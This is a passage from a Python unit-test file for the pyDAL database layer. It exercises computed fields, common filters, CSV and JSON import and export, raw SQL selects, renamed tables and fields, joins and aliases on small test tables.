db.commit()
# test checking that a compute field can refer to earlier-defined computed fields
db.define_table(
"tt",
Field("aa"),
Field("bb", default="x"),
Field("cc", compute=lambda r: r.aa + r.bb),
Field("dd", compute=lambda r: r.bb + r.cc),
)
db.commit()
id = db.tt.insert(aa="z")
self.assertEqual(db.tt[id].dd, "xzx")
class TestCommonFilters(DALtest):
def testRun(self):
db = self.connect()
db.define_table("t1", Field("aa", "integer"))
db.define_table("t2", Field("aa", "integer"), Field("b", db.t1))
i1 = db.t1.insert(aa=1)
i2 = db.t1.insert(aa=2)
i3 = db.t1.insert(aa=3)
db.t2.insert(aa=4, b=i1)
db.t2.insert(aa=5, b=i2)
db.t2.insert(aa=6, b=i2)
db.t1._common_filter = lambda q: db.t1.aa > 1
self.assertEqual(db(db.t1).count(), 2)
self.assertEqual(db(db.t1).count(), 2)
q = db.t2.b == db.t1.id
self.assertEqual(db(q).count(), 2)
self.assertEqual(db(q).count(), 2)
self.assertEqual(len(db(db.t1).select(left=db.t2.on(q))), 3)
db.t2._common_filter = lambda q: db.t2.aa < 6
self.assertEqual(db(q).count(), 1)
self.assertEqual(db(q).count(), 1)
self.assertEqual(len(db(db.t1).select(left=db.t2.on(q))), 2)
# test delete
self.assertEqual(db(db.t2).count(), 2)
db(db.t2).delete()
self.assertEqual(db(db.t2).count(), 0)
db.t2._common_filter = None
self.assertEqual(db(db.t2).count(), 1)
# test update
db.t2.insert(aa=4, b=i1)
db.t2.insert(aa=5, b=i2)
db.t2._common_filter = lambda q: db.t2.aa < 6
self.assertEqual(db(db.t2).count(), 2)
db(db.t2).update(aa=6)
self.assertEqual(db(db.t2).count(), 0)
db.t2._common_filter = None
self.assertEqual(db(db.t2).count(), 3)
class TestImportExportFields(DALtest):
def testRun(self):
db = self.connect()
db.define_table("person", Field("name"))
db.define_table("pet", Field("friend", db.person), Field("name"))
for n in range(2):
db(db.pet).delete()
db(db.person).delete()
for k in range(10):
id = db.person.insert(name=str(k))
db.pet.insert(friend=id, name=str(k))
db.commit()
stream = StringIO()
db.export_to_csv_file(stream)
db(db.pet).delete()
db(db.person).delete()
stream = StringIO(stream.getvalue())
db.import_from_csv_file(stream)
assert (
db(db.person.id == db.pet.friend)(db.person.name == db.pet.name).count()
== 10
)
class TestImportExportUuidFields(DALtest):
def testRun(self):
db = self.connect()
db.define_table("person", Field("name"), Field("uuid"))
db.define_table("pet", Field("friend", db.person), Field("name"))
for n in range(2):
db(db.pet).delete()
db(db.person).delete()
for k in range(10):
id = db.person.insert(name=str(k), uuid=str(k))
db.pet.insert(friend=id, name=str(k))
db.commit()
stream = StringIO()
db.export_to_csv_file(stream)
stream = StringIO(stream.getvalue())
db.import_from_csv_file(stream)
assert db(db.person).count() == 10
assert (
db(db.person.id == db.pet.friend)(db.person.name == db.pet.name).count()
== 20
)
class TestDALDictImportExport(unittest.TestCase):
def testRun(self):
db = DAL(DEFAULT_URI, check_reserved=["all"])
db.define_table("person", Field("name", default="Michael"), Field("uuid"))
db.define_table("pet", Field("friend", db.person), Field("name"))
dbdict = db.as_dict(flat=True, sanitize=False)
assert isinstance(dbdict, dict)
uri = dbdict["uri"]
assert isinstance(uri, basestring) and uri
assert len(dbdict["tables"]) == 2
assert len(dbdict["tables"][0]["fields"]) == 3
assert dbdict["tables"][0]["fields"][1]["type"] == db.person.name.type
assert dbdict["tables"][0]["fields"][1]["default"] == db.person.name.default
db2 = DAL(**dbdict)
assert len(db.tables) == len(db2.tables)
assert hasattr(db2, "pet") and isinstance(db2.pet, Table)
assert hasattr(db2.pet, "friend") and isinstance(db2.pet.friend, Field)
db.pet.drop()
db.commit()
db2.commit()
dbjson = db.as_json(sanitize=False)
assert isinstance(dbjson, basestring) and len(dbjson) > 0
db3 = DAL(**json.loads(dbjson))
assert hasattr(db3, "person") and hasattr(db3.person, "uuid")
assert db3.person.uuid.type == db.person.uuid.type
db3.person.drop()
db3.commit()
db3.close()
mpfc = "Monty Python's Flying Circus"
dbdict4 = {
"uri": DEFAULT_URI,
"tables": [
{
"tablename": "tvshow",
"fields": [
{"fieldname": "name", "default": mpfc},
{"fieldname": "rating", "type": "double"},
],
},
{
"tablename": "staff",
"fields": [
{"fieldname": "name", "default": "Michael"},
{"fieldname": "food", "default": "Spam"},
{"fieldname": "tvshow", "type": "reference tvshow"},
],
},
],
}
db4 = DAL(**dbdict4)
assert "staff" in db4.tables
assert "name" in db4.staff
assert db4.tvshow.rating.type == "double"
assert (
db4.tvshow.insert(),
db4.tvshow.insert(name="Loriot"),
db4.tvshow.insert(name="Il Mattatore"),
) == (1, 2, 3)
assert db4(db4.tvshow).select().first().id == 1
assert db4(db4.tvshow).select().first().name == mpfc
db4.staff.drop()
db4.tvshow.drop()
db4.commit()
dbdict5 = {"uri": DEFAULT_URI}
db5 = DAL(**dbdict5)
assert db5.tables in ([], None)
assert not (str(db5) in ("", None))
dbdict6 = {
"uri": DEFAULT_URI,
"tables": [
{"tablename": "staff"},
{
"tablename": "tvshow",
"fields": [
{"fieldname": "name"},
{"fieldname": "rating", "type": "double"},
],
},
],
}
db6 = DAL(**dbdict6)
assert len(db6["staff"].fields) == 1
assert "name" in db6["tvshow"].fields
assert db6.staff.insert() is not None
assert db6(db6.staff).select().first().id == 1
db6.staff.drop()
db6.tvshow.drop()
db6.commit()
db.close()
db2.close()
db4.close()
db5.close()
db6.close()
class TestSelectAsDict(DALtest):
def testSelect(self):
db = self.connect()
if IS_ORACLE:
# if lowercase fieldnames desired in return, must be quoted in oracle
db.define_table(
"a_table",
Field("b_field"),
Field("a_field"),
)
db.a_table.insert(a_field="aa1", b_field="bb1")
rtn = db.executesql(
'SELECT "id", "b_field", "a_field" FROM "a_table"', as_dict=True
)
self.assertEqual(rtn[0]["b_field"], "bb1")
rtn = db.executesql(
'SELECT "id", "b_field", "a_field" FROM "a_table"', as_ordered_dict=True
)
self.assertEqual(rtn[0]["b_field"], "bb1")
self.assertEqual(list(rtn[0].keys()), ["id", "b_field", "a_field"])
else:
db.define_table(
"a_table",
Field("b_field"),
Field("a_field"),
)
db.a_table.insert(a_field="aa1", b_field="bb1")
rtn = db.executesql(
"SELECT id, b_field, a_field FROM a_table", as_dict=True
)
self.assertEqual(rtn[0]["b_field"], "bb1")
rtn = db.executesql(
"SELECT id, b_field, a_field FROM a_table", as_ordered_dict=True
)
self.assertEqual(rtn[0]["b_field"], "bb1")
self.assertEqual(list(rtn[0].keys()), ["id", "b_field", "a_field"])
class TestExecuteSQL(DALtest):
def testSelect(self):
if IS_ORACLE:
# see note on prior test
db = self.connect(DEFAULT_URI, entity_quoting=True)
db.define_table(
"a_table",
Field("b_field"),
Field("a_field"),
)
db.a_table.insert(a_field="aa1", b_field="bb1")
rtn = db.executesql(
'SELECT "id", "b_field", "a_field" FROM "a_table"', as_dict=True
)
self.assertEqual(rtn[0]["b_field"], "bb1")
rtn = db.executesql(
'SELECT "id", "b_field", "a_field" FROM "a_table"', as_ordered_dict=True
)
self.assertEqual(rtn[0]["b_field"], "bb1")
self.assertEqual(rtn[0]["b_field"], "bb1")
self.assertEqual(list(rtn[0].keys()), ["id", "b_field", "a_field"])
rtn = db.executesql(
'select "id", "b_field", "a_field" from "a_table"', fields=db.a_table
)
self.assertTrue(
all(x in rtn[0].keys() for x in ["id", "b_field", "a_field"])
)
self.assertEqual(rtn[0].b_field, "bb1")
rtn = db.executesql(
'select "id", "b_field", "a_field" from "a_table"',
fields=db.a_table,
colnames=["a_table.id", "a_table.b_field", "a_table.a_field"],
)
self.assertTrue(
all(x in rtn[0].keys() for x in ["id", "b_field", "a_field"])
)
self.assertEqual(rtn[0].b_field, "bb1")
rtn = db.executesql(
'select COUNT(*) from "a_table"',
fields=[db.a_table.id.count()],
colnames=["foo"],
)
self.assertEqual(rtn[0].foo, 1)
if not IS_ORACLE:
db = self.connect(DEFAULT_URI, entity_quoting=False)
db.define_table(
"a_table",
Field("b_field"),
Field("a_field"),
)
db.a_table.insert(a_field="aa1", b_field="bb1")
rtn = db.executesql(
"SELECT id, b_field, a_field FROM a_table", as_dict=True
)
self.assertEqual(rtn[0]["b_field"], "bb1")
rtn = db.executesql(
"SELECT id, b_field, a_field FROM a_table", as_ordered_dict=True
)
self.assertEqual(rtn[0]["b_field"], "bb1")
self.assertEqual(rtn[0]["b_field"], "bb1")
self.assertEqual(list(rtn[0].keys()), ["id", "b_field", "a_field"])
rtn = db.executesql(
"select id, b_field, a_field from a_table", fields=db.a_table
)
self.assertTrue(
all(x in rtn[0].keys() for x in ["id", "b_field", "a_field"])
)
self.assertEqual(rtn[0].b_field, "bb1")
rtn = db.executesql(
"select id, b_field, a_field from a_table",
fields=db.a_table,
colnames=["a_table.id", "a_table.b_field", "a_table.a_field"],
)
self.assertTrue(
all(x in rtn[0].keys() for x in ["id", "b_field", "a_field"])
)
self.assertEqual(rtn[0].b_field, "bb1")
rtn = db.executesql(
"select COUNT(*) from a_table",
fields=[db.a_table.id.count()],
colnames=["foo"],
)
self.assertEqual(rtn[0].foo, 1)
class TestRNameTable(DALtest):
# tests for highly experimental rname attribute
def testSelect(self):
db = self.connect()
rname = "a_very_complicated_tablename"
if IS_ORACLE:
# name size limitations
rname = "a_complex_tablename"
db.define_table("easy_name", Field("a_field"), rname=rname)
rtn = db.easy_name.insert(a_field="a")
self.assertEqual(rtn.id, 1)
rtn = db(db.easy_name.a_field == "a").select()
self.assertEqual(len(rtn), 1)
self.assertEqual(rtn[0].id, 1)
self.assertEqual(rtn[0].a_field, "a")
db.easy_name.insert(a_field="b")
rtn = db(db.easy_name.id > 0).delete()
self.assertEqual(rtn, 2)
rtn = db(db.easy_name.id > 0).count()
self.assertEqual(rtn, 0)
db.easy_name.insert(a_field="a")
db.easy_name.insert(a_field="b")
rtn = db(db.easy_name.id > 0).count()
self.assertEqual(rtn, 2)
rtn = db(db.easy_name.a_field == "a").update(a_field="c")
rtn = db(db.easy_name.a_field == "c").count()
self.assertEqual(rtn, 1)
rtn = db(db.easy_name.a_field != "c").count()
self.assertEqual(rtn, 1)
avg = db.easy_name.id.avg()
rtn = db(db.easy_name.id > 0).select(avg)
self.assertEqual(rtn[0][avg], 3)
rname = "this_is_the_person_table"
db.define_table(
"person", Field("name", default="Michael"), Field("uuid"), rname=rname
)
rname = "this_is_the_pet_table"
db.define_table(
"pet", Field("friend", "reference person"), Field("name"), rname=rname
)
michael = db.person.insert() # default insert
john = db.person.insert(name="John")
luke = db.person.insert(name="Luke")
# michael owns Phippo
phippo = db.pet.insert(friend=michael, name="Phippo")
# john owns Dunstin and Gertie
dunstin = db.pet.insert(friend=john, name="Dunstin")
gertie = db.pet.insert(friend=john, name="Gertie")
rtn = db(db.person.id == db.pet.friend).select(orderby=db.person.id | db.pet.id)
self.assertEqual(len(rtn), 3)
self.assertEqual(rtn[0].person.id, michael)
self.assertEqual(rtn[0].person.name, "Michael")
self.assertEqual(rtn[0].pet.id, phippo)
self.assertEqual(rtn[0].pet.name, "Phippo")
self.assertEqual(rtn[1].person.id, john)
self.assertEqual(rtn[1].person.name, "John")
self.assertEqual(rtn[1].pet.name, "Dunstin")
self.assertEqual(rtn[2].pet.name, "Gertie")
# fetch owners, eventually with pet
# main point is retrieving Luke with no pets
rtn = db(db.person.id > 0).select(
orderby=db.person.id | db.pet.id,
left=db.pet.on(db.person.id == db.pet.friend),
)
self.assertEqual(rtn[0].person.id, michael)
self.assertEqual(rtn[0].person.name, "Michael")
self.assertEqual(rtn[0].pet.id, phippo)
self.assertEqual(rtn[0].pet.name, "Phippo")
self.assertEqual(rtn[3].person.name, "Luke")
self.assertEqual(rtn[3].person.id, luke)
self.assertEqual(rtn[3].pet.name, None)
# lets test a subquery
subq = db(db.pet.name == "Gertie")._select(db.pet.friend)
rtn = db(db.person.id.belongs(subq)).select()
self.assertEqual(rtn[0].id, 2)
self.assertEqual(rtn[0]("person.name"), "John")
# as dict
rtn = db(db.person.id > 0).select().as_dict()
self.assertEqual(rtn[1]["name"], "Michael")
# as list
rtn = db(db.person.id > 0).select().as_list()
self.assertEqual(rtn[0]["name"], "Michael")
# isempty
rtn = db(db.person.id > 0).isempty()
self.assertEqual(rtn, False)
# join argument
rtn = db(db.person).select(
orderby=db.person.id | db.pet.id,
join=db.pet.on(db.person.id == db.pet.friend),
)
self.assertEqual(len(rtn), 3)
self.assertEqual(rtn[0].person.id, michael)
self.assertEqual(rtn[0].person.name, "Michael")
self.assertEqual(rtn[0].pet.id, phippo)
self.assertEqual(rtn[0].pet.name, "Phippo")
self.assertEqual(rtn[1].person.id, john)
self.assertEqual(rtn[1].person.name, "John")
self.assertEqual(rtn[1].pet.name, "Dunstin")
self.assertEqual(rtn[2].pet.name, "Gertie")
# aliases
if DEFAULT_URI.startswith("mssql"):
# multiple cascade gotcha
for key in ["reference", "reference FK"]:
db._adapter.types[key] = db._adapter.types[key].replace(
"%(on_delete_action)s", "NO ACTION"
)
rname = "the_cubs"
db.define_table(
"pet_farm",
Field("name"),
Field("father", "reference pet_farm"),
Field("mother", "reference pet_farm"),
rname=rname,
)
minali = db.pet_farm.insert(name="Minali")
osbert = db.pet_farm.insert(name="Osbert")
# they had a cub
selina = db.pet_farm.insert(name="Selina", father=osbert, mother=minali)
father = db.pet_farm.with_alias("father")
mother = db.pet_farm.with_alias("mother")
# fetch pets with relatives
rtn = db().select(
db.pet_farm.name,
father.name,
mother.name,
left=[
father.on(father.id == db.pet_farm.father),
mother.on(mother.id == db.pet_farm.mother),
],
orderby=db.pet_farm.id,
)
self.assertEqual(len(rtn), 3)
self.assertEqual(rtn[0].pet_farm.name, "Minali")
self.assertEqual(rtn[0].father.name, None)
self.assertEqual(rtn[0].mother.name, None)
self.assertEqual(rtn[1].pet_farm.name, "Osbert")
self.assertEqual(rtn[2].pet_farm.name, "Selina")
self.assertEqual(rtn[2].father.name, "Osbert")
self.assertEqual(rtn[2].mother.name, "Minali")
def testJoin(self):
db = self.connect()
rname = "this_is_table_t1"
rname2 = "this_is_table_t2"
db.define_table("t1", Field("aa"), rname=rname)
db.define_table("t2", Field("aa"), Field("b", db.t1), rname=rname2)
i1 = db.t1.insert(aa="1")
i2 = db.t1.insert(aa="2")
i3 = db.t1.insert(aa="3")
db.t2.insert(aa="4", b=i1)
db.t2.insert(aa="5", b=i2)
db.t2.insert(aa="6", b=i2)
self.assertEqual(
len(db(db.t1.id == db.t2.b).select(orderby=db.t1.aa | db.t2.aa)), 3
)
self.assertEqual(
db(db.t1.id == db.t2.b).select(orderby=db.t1.aa | db.t2.aa)[2].t1.aa, "2"
)
self.assertEqual(
db(db.t1.id == db.t2.b).select(orderby=db.t1.aa | db.t2.aa)[2].t2.aa, "6"
)
self.assertEqual(
len(
db().select(
db.t1.ALL,
db.t2.ALL,
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa | db.t2.aa,
)
),
4,
)
self.assertEqual(
db()
.select(
db.t1.ALL,
db.t2.ALL,
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa | db.t2.aa,
)[2]
.t1.aa,
"2",
)
self.assertEqual(
db()
.select(
db.t1.ALL,
db.t2.ALL,
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa | db.t2.aa,
)[2]
.t2.aa,
"6",
)
self.assertEqual(
db()
.select(
db.t1.ALL,
db.t2.ALL,
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa | db.t2.aa,
)[3]
.t1.aa,
"3",
)
self.assertEqual(
db()
.select(
db.t1.ALL,
db.t2.ALL,
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa | db.t2.aa,
)[3]
.t2.aa,
None,
)
self.assertEqual(
len(
db().select(
db.t1.aa,
db.t2.id.count(),
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa,
groupby=db.t1.aa,
)
),
3,
)
self.assertEqual(
db()
.select(
db.t1.aa,
db.t2.id.count(),
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa,
groupby=db.t1.aa,
)[0]
._extra[db.t2.id.count()],
1,
)
self.assertEqual(
db()
.select(
db.t1.aa,
db.t2.id.count(),
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa,
groupby=db.t1.aa,
)[1]
._extra[db.t2.id.count()],
2,
)
self.assertEqual(
db()
.select(
db.t1.aa,
db.t2.id.count(),
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa,
groupby=db.t1.aa,
)[2]
._extra[db.t2.id.count()],
0,
)
db.t2.drop()
db.t1.drop()
db.define_table("person", Field("name"), rname=rname)
id = db.person.insert(name="max")
self.assertEqual(id.name, "max")
db.define_table(
"dog", Field("name"), Field("ownerperson", "reference person"), rname=rname2
)
db.dog.insert(name="skipper", ownerperson=1)
row = db(db.person.id == db.dog.ownerperson).select().first()
self.assertEqual(row[db.person.name], "max")
self.assertEqual(row["person.name"], "max")
db.dog.drop()
self.assertEqual(len(db.person._referenced_by), 0)
class TestRNameFields(DALtest):
# tests for highly experimental rname attribute
def testSelect(self):
db = self.connect()
rname = "a_very_complicated_fieldname"
rname2 = "rrating_from_1_to_10"
db.define_table(
"easy_name",
Field("a_field", rname=rname),
Field("rating", "integer", rname=rname2, default=2),
)
rtn = db.easy_name.insert(a_field="a")
self.assertEqual(rtn.id, 1)
rtn = db(db.easy_name.a_field == "a").select()
self.assertEqual(len(rtn), 1)
self.assertEqual(rtn[0].id, 1)
self.assertEqual(rtn[0].a_field, "a")
db.easy_name.insert(a_field="b")
rtn = db(db.easy_name.id > 0).delete()
self.assertEqual(rtn, 2)
rtn = db(db.easy_name.id > 0).count()
self.assertEqual(rtn, 0)
db.easy_name.insert(a_field="a")
db.easy_name.insert(a_field="b")
rtn = db(db.easy_name.id > 0).count()
self.assertEqual(rtn, 2)
rtn = db(db.easy_name.a_field == "a").update(a_field="c")
rtn = db(db.easy_name.a_field == "c").count()
self.assertEqual(rtn, 1)
rtn = db(db.easy_name.a_field != "c").count()
self.assertEqual(rtn, 1)
avg = db.easy_name.id.avg()
rtn = db(db.easy_name.id > 0).select(avg)
self.assertEqual(rtn[0][avg], 3)
avg = db.easy_name.rating.avg()
rtn = db(db.easy_name.id > 0).select(avg)
self.assertEqual(rtn[0][avg], 2)
rname = "this_is_the_person_name"
db.define_table(
"person",
Field("id", type="id", rname="fooid"),
Field("name", default="Michael", rname=rname),
Field("uuid"),
)
rname = "this_is_the_pet_name"
db.define_table(
"pet", Field("friend", "reference person"), Field("name", rname=rname)
)
michael = db.person.insert() # default insert
john = db.person.insert(name="John")
luke = db.person.insert(name="Luke")
# michael owns Phippo
phippo = db.pet.insert(friend=michael, name="Phippo")
# john owns Dunstin and Gertie
dunstin = db.pet.insert(friend=john, name="Dunstin")
gertie = db.pet.insert(friend=john, name="Gertie")
rtn = db(db.person.id == db.pet.friend).select(orderby=db.person.id | db.pet.id)
self.assertEqual(len(rtn), 3)
self.assertEqual(rtn[0].person.id, michael)
self.assertEqual(rtn[0].person.name, "Michael")
self.assertEqual(rtn[0].pet.id, phippo)
self.assertEqual(rtn[0].pet.name, "Phippo")
self.assertEqual(rtn[1].person.id, john)
self.assertEqual(rtn[1].person.name, "John")
self.assertEqual(rtn[1].pet.name, "Dunstin")
self.assertEqual(rtn[2].pet.name, "Gertie")
# fetch owners, eventually with pet
# main point is retrieving Luke with no pets
rtn = db(db.person.id > 0).select(
orderby=db.person.id | db.pet.id,
left=db.pet.on(db.person.id == db.pet.friend),
)
self.assertEqual(rtn[0].person.id, michael)
self.assertEqual(rtn[0].person.name, "Michael")
self.assertEqual(rtn[0].pet.id, phippo)
self.assertEqual(rtn[0].pet.name, "Phippo")
self.assertEqual(rtn[3].person.name, "Luke")
self.assertEqual(rtn[3].person.id, luke)
self.assertEqual(rtn[3].pet.name, None)
# lets test a subquery
subq = db(db.pet.name == "Gertie")._select(db.pet.friend)
rtn = db(db.person.id.belongs(subq)).select()
self.assertEqual(rtn[0].id, 2)
self.assertEqual(rtn[0]("person.name"), "John")
# as dict
rtn = db(db.person.id > 0).select().as_dict()
self.assertEqual(rtn[1]["name"], "Michael")
# as list
rtn = db(db.person.id > 0).select().as_list()
self.assertEqual(rtn[0]["name"], "Michael")
# isempty
rtn = db(db.person.id > 0).isempty()
self.assertEqual(rtn, False)
# join argument
rtn = db(db.person).select(
orderby=db.person.id | db.pet.id,
join=db.pet.on(db.person.id == db.pet.friend),
)
self.assertEqual(len(rtn), 3)
self.assertEqual(rtn[0].person.id, michael)
self.assertEqual(rtn[0].person.name, "Michael")
self.assertEqual(rtn[0].pet.id, phippo)
self.assertEqual(rtn[0].pet.name, "Phippo")
self.assertEqual(rtn[1].person.id, john)
self.assertEqual(rtn[1].person.name, "John")
self.assertEqual(rtn[1].pet.name, "Dunstin")
self.assertEqual(rtn[2].pet.name, "Gertie")
# aliases
rname = "the_cub_name"
if DEFAULT_URI.startswith("mssql"):
# multiple cascade gotcha
for key in ["reference", "reference FK"]:
db._adapter.types[key] = db._adapter.types[key].replace(
"%(on_delete_action)s", "NO ACTION"
)
db.define_table(
"pet_farm",
Field("name", rname=rname),
Field("father", "reference pet_farm"),
Field("mother", "reference pet_farm"),
)
minali = db.pet_farm.insert(name="Minali")
osbert = db.pet_farm.insert(name="Osbert")
# they had a cub
selina = db.pet_farm.insert(name="Selina", father=osbert, mother=minali)
father = db.pet_farm.with_alias("father")
mother = db.pet_farm.with_alias("mother")
# fetch pets with relatives
rtn = db().select(
db.pet_farm.name,
father.name,
mother.name,
left=[
father.on(father.id == db.pet_farm.father),
mother.on(mother.id == db.pet_farm.mother),
],
orderby=db.pet_farm.id,
)
self.assertEqual(len(rtn), 3)
self.assertEqual(rtn[0].pet_farm.name, "Minali")
self.assertEqual(rtn[0].father.name, None)
self.assertEqual(rtn[0].mother.name, None)
self.assertEqual(rtn[1].pet_farm.name, "Osbert")
self.assertEqual(rtn[2].pet_farm.name, "Selina")
self.assertEqual(rtn[2].father.name, "Osbert")
self.assertEqual(rtn[2].mother.name, "Minali")
def testRun(self):
db = self.connect()
rname = "a_very_complicated_fieldname"
for ft in ["string", "text", "password", "upload", "blob"]:
db.define_table("tt", Field("aa", ft, default="", rname=rname))
self.assertEqual(db.tt.insert(aa="x"), 1)
if not IS_ORACLE:
self.assertEqual(db().select(db.tt.aa)[0].aa, "x")
db.tt.drop()
db.define_table("tt", Field("aa", "integer", default=1, rname=rname))
self.assertEqual(db.tt.insert(aa=3), 1)
self.assertEqual(db().select(db.tt.aa)[0].aa, 3)
db.tt.drop()
db.define_table("tt", Field("aa", "double", default=1, rname=rname))
self.assertEqual(db.tt.insert(aa=3.1), 1)
self.assertEqual(db().select(db.tt.aa)[0].aa, 3.1)
db.tt.drop()
db.define_table("tt", Field("aa", "boolean", default=True, rname=rname))
self.assertEqual(db.tt.insert(aa=True), 1)
self.assertEqual(db().select(db.tt.aa)[0].aa, True)
db.tt.drop()
if not IS_ORACLE:
db.define_table("tt", Field("aa", "json", default={}, rname=rname))
self.assertEqual(db.tt.insert(aa={}), 1)
self.assertEqual(db().select(db.tt.aa)[0].aa, {})
db.tt.drop()
db.define_table(
"tt", Field("aa", "date", default=datetime.date.today(), rname=rname)
)
t0 = datetime.date.today()
self.assertEqual(db.tt.insert(aa=t0), 1)
self.assertEqual(db().select(db.tt.aa)[0].aa, t0)
db.tt.drop()
db.define_table(
"tt",
Field("aa", "datetime", default=datetime.datetime.today(), rname=rname),
)
t0 = datetime.datetime(
1971,
12,
21,
10,
30,
55,
0,
)
self.assertEqual(db.tt.insert(aa=t0), 1)
self.assertEqual(db().select(db.tt.aa)[0].aa, t0)
## Row APIs
row = db().select(db.tt.aa)[0]
self.assertEqual(db.tt[1].aa, t0)
self.assertEqual(db.tt["aa"], db.tt.aa)
self.assertEqual(db.tt(1).aa, t0)
self.assertTrue(db.tt(1, aa=None) == None)
self.assertFalse(db.tt(1, aa=t0) == None)
self.assertEqual(row.aa, t0)
self.assertEqual(row["aa"], t0)
self.assertEqual(row["tt.aa"], t0)
self.assertEqual(row("tt.aa"), t0)
self.assertTrue("aa" in row)
self.assertTrue("pydal" not in row)
self.assertTrue(hasattr(row, "aa"))
self.assertFalse(hasattr(row, "pydal"))
## Lazy and Virtual fields
db.tt.b = Field.Virtual(lambda row: row.tt.aa)
db.tt.c = Field.Lazy(lambda row: row.tt.aa)
row = db().select(db.tt.aa)[0]
self.assertEqual(row.b, t0)
self.assertEqual(row.c(), t0)
db.tt.drop()
db.define_table("tt", Field("aa", "time", default="11:30", rname=rname))
t0 = datetime.time(10, 30, 55)
self.assertEqual(db.tt.insert(aa=t0), 1)
self.assertEqual(db().select(db.tt.aa)[0].aa, t0)
def testInsert(self):
db = self.connect()
rname = "a_very_complicated_fieldname"
db.define_table("tt", Field("aa", rname=rname))
self.assertEqual(db.tt.insert(aa="1"), 1)
self.assertEqual(db.tt.insert(aa="1"), 2)
self.assertEqual(db.tt.insert(aa="1"), 3)
self.assertEqual(db(db.tt.aa == "1").count(), 3)
self.assertEqual(db(db.tt.aa == "2").isempty(), True)
self.assertEqual(db(db.tt.aa == "1").update(aa="2"), 3)
self.assertEqual(db(db.tt.aa == "2").count(), 3)
self.assertEqual(db(db.tt.aa == "2").isempty(), False)
self.assertEqual(db(db.tt.aa == "2").delete(), 3)
self.assertEqual(db(db.tt.aa == "2").isempty(), True)
def testJoin(self):
db = self.connect()
rname = "this_is_field_aa"
rname2 = "this_is_field_b"
db.define_table("t1", Field("aa", rname=rname))
db.define_table("t2", Field("aa", rname=rname), Field("b", db.t1, rname=rname2))
i1 = db.t1.insert(aa="1")
i2 = db.t1.insert(aa="2")
i3 = db.t1.insert(aa="3")
db.t2.insert(aa="4", b=i1)
db.t2.insert(aa="5", b=i2)
db.t2.insert(aa="6", b=i2)
self.assertEqual(
len(db(db.t1.id == db.t2.b).select(orderby=db.t1.aa | db.t2.aa)), 3
)
self.assertEqual(
db(db.t1.id == db.t2.b).select(orderby=db.t1.aa | db.t2.aa)[2].t1.aa, "2"
)
self.assertEqual(
db(db.t1.id == db.t2.b).select(orderby=db.t1.aa | db.t2.aa)[2].t2.aa, "6"
)
self.assertEqual(
len(
db().select(
db.t1.ALL,
db.t2.ALL,
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa | db.t2.aa,
)
),
4,
)
self.assertEqual(
db()
.select(
db.t1.ALL,
db.t2.ALL,
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa | db.t2.aa,
)[2]
.t1.aa,
"2",
)
self.assertEqual(
db()
.select(
db.t1.ALL,
db.t2.ALL,
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa | db.t2.aa,
)[2]
.t2.aa,
"6",
)
self.assertEqual(
db()
.select(
db.t1.ALL,
db.t2.ALL,
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa | db.t2.aa,
)[3]
.t1.aa,
"3",
)
self.assertEqual(
db()
.select(
db.t1.ALL,
db.t2.ALL,
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa | db.t2.aa,
)[3]
.t2.aa,
None,
)
self.assertEqual(
len(
db().select(
db.t1.aa,
db.t2.id.count(),
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa,
groupby=db.t1.aa,
)
),
3,
)
self.assertEqual(
db()
.select(
db.t1.aa,
db.t2.id.count(),
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa,
groupby=db.t1.aa,
)[0]
._extra[db.t2.id.count()],
1,
)
self.assertEqual(
db()
.select(
db.t1.aa,
db.t2.id.count(),
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa,
groupby=db.t1.aa,
)[1]
._extra[db.t2.id.count()],
2,
)
self.assertEqual(
db()
.select(
db.t1.aa,
db.t2.id.count(),
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa,
groupby=db.t1.aa,
)[2]
._extra[db.t2.id.count()],
0,
)
db.t2.drop()
db.t1.drop()
db.define_table("person", Field("name", rname=rname))
id = db.person.insert(name="max")
self.assertEqual(id.name, "max")
db.define_table(
"dog",
Field("name", rname=rname),
Field("ownerperson", "reference person", rname=rname2),
)
db.dog.insert(name="skipper", ownerperson=1)
row = db(db.person.id == db.dog.ownerperson).select().first()
self.assertEqual(row[db.person.name], "max")
self.assertEqual(row["person.name"], "max")
db.dog.drop()
self.assertEqual(len(db.person._referenced_by), 0)
def testTFK(self):
db = self.connect()
if "reference TFK" not in db._adapter.types:
self.skipTest("Adapter does not support TFK references")
db.define_table(
"t1",
Field("id1", type="string", length=1, rname="foo1"),
Field("id2", type="integer", rname="foo2"),
Field("val", type="integer"),
primarykey=["id1", "id2"],
)
db.define_table(
"t2",
Field("ref1", type=db.t1.id1, rname="bar1"),
Field("ref2", type=db.t1.id2, rname="bar2"),
)
db.t1.insert(id1="a", id2=1, val=10)
db.t1.insert(id1="a", id2=2, val=30)
db.t2.insert(ref1="a", ref2=1)
query = (db.t1.id1 == db.t2.ref1) & (db.t1.id2 == db.t2.ref2)
result = db(query).select(db.t1.ALL)
self.assertEqual(len(result), 1)
self.assertEqual(result[0]["id1"], "a")
self.assertEqual(result[0]["id2"], 1)
self.assertEqual(result[0]["val"], 10)
class TestQuoting(DALtest):
# tests for case sensitivity
def testCase(self):
db = self.connect(ignore_field_case=False, entity_quoting=True)
if DEFAULT_URI.startswith("mssql"):
# multiple cascade gotcha
for key in ["reference", "reference FK"]:
db._adapter.types[key] = db._adapter.types[key].replace(
"%(on_delete_action)s", "NO ACTION"
)
t0 = db.define_table("t0", Field("f", "string"))
t1 = db.define_table("b", Field("B", t0), Field("words", "text"))
blather = "blah blah and so"
t0[None] = {"f": "content"}
